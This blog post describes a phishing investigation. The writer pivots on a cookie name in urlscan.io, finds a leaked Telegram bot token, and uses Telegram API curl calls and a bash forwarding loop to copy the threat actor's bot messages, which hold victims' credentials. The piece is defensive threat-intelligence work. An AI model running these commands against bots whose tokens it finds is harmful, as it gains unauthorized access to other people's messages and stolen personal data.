From Phishing to Infiltration: How a Leaked Telegram Bot Token Unveiled a Threat Actor’s Entire Operations

In cybersecurity, even the most routine tasks can lead to unexpected discoveries. This is a story about how analyzing a single phishing email and pivoting off a few intriguing data points led me to uncover more phish set up by the same threat actor. One of these phishing pages was inadvertently leaking a Telegram bot token along with a chat ID, which allowed me to infiltrate their bot.

This bot wasn’t just a tool — it was the nerve center of their entire phishing campaign, providing real-time data on compromised victims. The process I followed is straightforward, and with a bit of luck, you too might stumble upon something very interesting.

Let’s Begin !!!

It all started with a phishing email that showed up in my inbox. At first, it seemed like another run-of-the-mill scam: a counterfeit login page aimed at stealing credentials. Instead of brushing it off, I decided to investigate further. I tested the link in a sandbox environment to analyze the landing page and examine the files and assets it loaded. To further probe the attacker’s setup, I entered some fake credentials just for fun.

I like to look at these phishing pages and URLs in URLScan.io.

Expanding the Investigation: Mapping Out the Threat Actor’s Network

Urlscan.io is an invaluable tool for analyzing suspicious links and uncovering detailed information about potentially malicious sites. It provides a wealth of data, including the domain’s DNS records, SSL certificates, and hosting details, which can reveal connections to other malicious sites. Additionally, it captures metadata such as the site’s response headers, IP address, and geographical location of the server.

I frequently check the DOM and Content tabs on urlscan.io, as they can sometimes reveal specific keywords that help refine searches. This time, however, nothing stood out. While using the browser’s Web Developer tools, I noticed an unusual cookie name associated with the phishing page. On urlscan.io, you can use the content.CookieNames filter to search specifically by cookie names, so I decided to give that a try.

content.cookieNames:"nameofthecookie"

And to my wonder the results I got were quite interesting.

Out of over 1,000 results — some of which were older — I focused on the most recent ones and noticed a pattern: many pages were flagged as malicious. As I investigated these pages, it became clear that they were all part of a phishing scheme targeting multiple companies and organizations around the globe. Each site offered additional clues, eventually leading me to a phishing page leaking a BASE64-encoded global variable, specifically “var token” and “var chatID.” I quickly decoded the token using CyberChef, revealing data that looked something like this (dummy data provided for explanation purposes):

token = 1234567890:ABCdefGHIjklMNO_pqrSTUVwxYz1234567890
chatID = 1122334455 // dummy data

Telegram bot token and a chat ID — a mistake on the attacker’s part but a golden opportunity for me. With this token, I could access the bot’s API and gain direct insight into the bot’s chat & possible their operations.

Infiltration: Exploiting the Bot’s Misconfigurations

It’s not uncommon for attackers to use malicious packages that exfiltrate victims’ data via Telegram bots. With the bot token and chat ID in hand, I immediately turned to Telegram’s API to see if I could extract any useful information.

The first step involved using the Telegram API’s getMe method with the bot token, as illustrated below:

curl "https://api.telegram.org/bot{bot-token}/getMe"

This command will verify if the bot is active and provide crucial details, including the bot’s username, the account username that created it, its ID, and more. Below is an example of the kind of data you can expect if the curl command to the API is successful:

Next step is to get access to the chat where the real treasure happens to be, so we use the below API to fetch messages from the target bot.

curl "https://api.telegram.org/bot{bot-token}/getUpdates"

The getUpdates API method in Telegram is used to retrieve incoming updates for a bot. This includes messages, commands, and other events that the bot should process. It's particularly useful for bots that are not using webhooks and are polling for updates.

Additionally, you can create your own Telegram bot and use the /forwardMessage API to forward messages to your bot, provided you have the necessary information. This includes the attacker bot's chat ID, the attacker’s token, your bot’s chat ID, and the message IDs you need to iterate through to forward all messages one by one.

I created a script that iterated through each message ID, forwarding all the messages from the threat actor’s bot to my own bot. This allowed me to capture and review all the messages that had been received by the threat actor’s bot.

curl -Uri “https://api.telegram.org/bot{attacker_bot_token}/forwardMessage” -Method POST -ContentType “application/json” -Body ‘{“from_chat_id”:”{attacker_chat_id}”, “chat_id”:”{my_chat_id}”, “message_id”:”{message_id}”}’

#!/bin/bash

attacker_Bot_Token="your_bot_token"
attacker_chat_id="attacker_chat_id"
my_chat_id="your_chat_id"

# Replace with a list of message IDs you want to forward
message_ids=(message_id_1 message_id_2 message_id_3)

for message_id in "${message_ids[@]}"; do
  curl -X POST "https://api.telegram.org/bot${attacker_Bot_Token}/forwardMessage" \
    -H "Content-Type: application/json" \
    -d '{"from_chat_id":"'"${attacker_chat_id}"'","chat_id":"'"${my_chat_id}"'","message_id":'"${message_id}"'}'
done

Explanation:

Replace your_bot_token, attacker_chat_id, and your_chat_id with your actual values.

Replace message_id_1, message_id_2, etc., in the message_ids array with the message IDs you want to forward.

The curl command is used to make HTTP requests in Linux.

The loop iterates over each message_id and sends a POST request to forward the message.

The Real-Time Gold Mine: Live Data from Phishing Attacks

This chat was a gold mine. Every time someone fell for one of the phishing scams, the bot would post a new message in the chat. These messages contained the phished victim’s credentials, along with additional data such as their IP address, geographical location (determined via ipinfo), and user-agent information. This wasn’t just historical data; it was happening in real-time. I could see the attackers’ successes as they unfolded.

The Bigger Picture: Inside the Threat Actor’s Operations

As I monitored the chat, I gained valuable insights into the threat actor’s operations. The compromised credentials included accounts from various companies, startups in the tech, medical and few other industries, highlighting the scale and potential impact of their phishing campaigns.

Conclusion

This experience underscores the importance of digging deeper into even the most routine phishing emails. A single email led to the discovery of a token that was leaked in a threat actor’s infrastructure, allowing us to gain real-time insight into their operations and turn the tables on them.

In cybersecurity, the smallest clues can lead to the biggest breakthroughs. This case is a powerful reminder of why it’s essential to follow up on every lead, no matter how insignificant it might seem. You never know what you might uncover when you do.

Thanks for reading!